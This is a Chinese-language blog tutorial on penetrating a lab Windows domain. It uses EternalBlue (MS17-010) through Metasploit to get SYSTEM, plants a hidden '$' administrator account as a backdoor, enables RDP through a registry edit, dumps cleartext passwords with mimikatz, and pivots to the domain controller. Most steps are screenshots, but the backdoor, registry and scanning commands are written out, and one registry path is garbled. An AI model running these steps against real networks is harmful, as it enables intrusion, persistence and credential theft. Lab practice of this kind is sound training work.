域渗透详解

一、域环境搭建

1、子域主机:Windows7(192.168.162.134),加入域yst;

2、域控制器:Windows2008(192.168.162.150)

3、攻击主机:kali(192.168.162.131)

二、域渗透

1、信息收集:扫描获取目标网段所有主机的IP、系统版本、开放端口等信息;

(1)、ip扫描

6fe336286b3c42d9a667a810c64293ec.png

获取到子域主机IP:192.168.162.134

(2)、详细扫描

daed6e7fe83b45feb0b018a0bf2b4167.png

8e57f274f3934f27b1a58f74e0107bb0.png

目标主机开放445端口,而且系统版本是win7或者2008,主机属于YST域;

二、子域主机的渗透

该主机445端口开放,版本为win7或者2008,符合永恒之蓝漏洞(ms 17-010),所以进行尝试验证:

永恒之蓝漏洞:永恒之蓝漏洞讲解

1、msf下搜索ms 17-010

287f9aab3e034d81899190b1ef95e9d3.png

2、使用auxiliary/scanner/smb/smb_ms17_010进行判断

c53c48922c9441e58c2dcffec8f4a17b.png

配置目标主机,run,检测显示目标主机大概率存在ms17-010

3、接下来使用模块进行漏洞利用

8ea059d910c14232b933ada8fd1ef2cb.png

使用攻击模块,这次为了进行域渗透,dump密码,所以我们要拿到更高权限的shell,因此我们要配置payload

ce9e7d587ac145e7aa9c3ab1b3c478ec.png

配置完payload后,show options

dc8cfab66a044de8b7563c1c91c9a1f1.png

我们需要配置rhost(目标主机IP)和lhost(本机IP)

2bcc22b303ef4420a15336fbf6e13166.png

配置完成后,再次show options查看:

3537a128ed9f45c5a153d63baa96512c.png

进行攻击:exploit

45a9ad7dd9954c9ba0c1a496d40dbe30.png

反弹shell,进行权限查看:

f32043a7788e435086ac1e7e12279318.png

成功拿到子域主机的system权限;

三、域内成员密码dump

1、通过子域主机查看域信息

61908e61ea1e45a4aa39d71d2dea742d.png

域名为:yst.com

2、在拿下的子域主机上留后门

(1)、新建用户

54159ba4e10541b3a513c7d24881f8e1.png

 用户名后带$符,便于隐藏,用户在输入net user命令时,不显示;

(2)、net localgroup administrators rxx$ /add        #将用户rxx$加入管理员组

 (3)、开启3389端口

1、REG ADD HKLMYSYSTEMYCurrentControlSet\Control Terminal" "Server /v fDenyTSConnections /t REG DWORD /d 00000000 /f         #开启3389端口

2、REG ADD HKLMYSYSTEMYCurrentControlSet\Control Terminal" "Server /v fDenyTSConnections /t REG DWORD /d 11111111 /f         #关闭3389端口

c9bc3aea681248ce84a928f842ac7125.png

(3)、远程登陆

rdesktop 192.168.162.134:3389        #linux下远程桌面连接命令

78e5eadcc1334fda94bf8a4e0a887dbd.png

193d8d2c4bd44f48959a88972d48113c.png

 后门成功;

3、获取用户和密码

退出shell,加载猕猴桃(mimikatz),使用keberos模块获取明文密码

8aa60b13fa9b462cbcc962db5ca77a33.png

 四、内网域控渗透

1、内网主机发现,获取域控IP

总结的方法如下:
1、在meterpreter下:
    (1)、run post/windows/gather/arp_scanner rhosts=192.168.162.0/24     #基于arp协议
    (2)、run post/multi/gather/ping_sweep rhosts=192.168.162.0/24        #基于ping命令
    (3)、meterpreter >info post/multi/gather/ping_sweep
2、进入shell,在cmd下:
    ipconfig /all    #查看用户IP信息,主要观察DNS服务器IP
    route print      #查看路由表


两种方法对照着来,判断内网域控主机的IP地址

a4c30faeb27e454bbdcbfc29a528d004.png

通过DNS判断内网域控IP:192.168.162.150

2、端口信息扫描

1、shell下:
C:\Windows\system32>exit            #退出shell,返回到meterpreter

2、meterpreter下:
meterpreter >backgroud               #返回到msf

3、msf下:
route add 192.168.162.134 255.255.255.0 1        #给msf添加路由,方便nmap进行内网扫描

路由添加成功后接下来进行内网扫描,方法如下:
auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机
auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描

4、选择要使用的模块:
(1)、use auxiliary/scanner/discovery/udp_sweep
     set rhosts 192.168.162.150
(2)、use auxiliary/scanner/discovery/udp_probe
     set rhosts 192.168.162.150
(3)、use auxiliary/scanner/netbios/nbname
     set rhosts 192.168.162.150
(4)、use auxiliary/scanner/portscan/tcp
     set rhosts 192.168.162.150

c3cc4de270b9417c9ce0f2137da93e60.png

扫描结果如下:

9dbcbf247b194c0fa1a098733c7cf505.png

3、漏洞利用

域控主机445,3389端口开放,也可能存在ms17-010漏洞,但我们已经拿下了子域主机和域控管理员账号,所以直接利用3389进行远程连接;

(1)、kali连接域控:rdesktop 192.168.162.150:3389

642a22607d0741d1a690b4c404bf5495.png

 (2)、通过猕猴桃查到的密码进行登录

cf8075ce129a4240b69119980fe88ffb.png

 域渗透完成。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值